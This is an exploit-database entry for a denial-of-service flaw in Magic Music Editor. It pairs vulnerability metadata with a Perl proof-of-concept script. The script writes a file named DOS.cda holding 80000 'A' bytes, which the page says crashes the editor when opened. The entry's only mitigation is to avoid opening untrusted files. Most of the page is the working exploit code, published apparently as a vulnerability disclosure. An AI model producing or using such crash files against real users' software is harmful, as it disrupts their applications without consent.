header-logo
Suggest Exploit
vendor:
Magic Music Editor
by:
AtT4CKxT3rR0r1ST
7.5
CVSS
HIGH
Denial of Service (DoS)
400
CWE
Product Name: Magic Music Editor
Affected Version From: All Versions
Affected Version To: All Versions
Patch Exists: Unknown
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
Unknown

Magic Music Editor .cda DOS

This exploit creates a file named DOS.cda with a length of 80000 bytes, which causes Magic Music Editor to crash when the file is opened.

Mitigation:

The user should avoid opening files from untrusted sources.
Source

Exploit-DB raw data:

#!/usr/bin/perl
# Exploit Title: Magic Music Editor .cda DOS
# Version      : All Version
# Author       : AtT4CKxT3rR0r1ST  [F.Hack@w.cn]
# Download     : http://www.magic-video-software.com/magic_music_editor/download.html
# Sp3C!4L Gr34T$ T0 h1ch4m 
##############################################################
my $file= "DOS.cda"; 
my $junk = "\x41" x 80000; 
open($FILE,">$file"); 
print $FILE $junk; 
close($FILE); 
print "Files Created successfully\n"; 
sleep(1);